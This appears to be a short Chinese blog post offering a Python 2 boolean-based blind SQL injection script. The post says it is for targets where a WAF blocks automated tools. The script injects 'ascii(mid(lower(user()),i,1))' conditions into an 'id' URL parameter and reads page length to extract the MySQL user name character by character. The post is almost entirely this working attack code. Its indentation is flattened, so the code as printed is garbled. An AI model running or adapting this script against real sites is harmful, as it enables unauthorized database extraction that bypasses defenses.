Mysql布尔盲注脚本

当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#! usr/bin/env python
# -*- coding: utf-8 -*-

import httplib
import time
import string
import sys
import random
import urllib

headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,21):
for payload in payloads:
conn = httplib.HTTPConnection('www.example.com', timeout=4) #连接,host
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) #payload
conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers) #url
html_header= conn.getresponse().read()
length=len(html_header)
if length>10000:
user+=payload
sys.stdout.write('\r[In progress] %s' % user)
sys.stdout.flush()
break
else:
print '.',
conn.close()

print '\n[Done]MySQL user is', user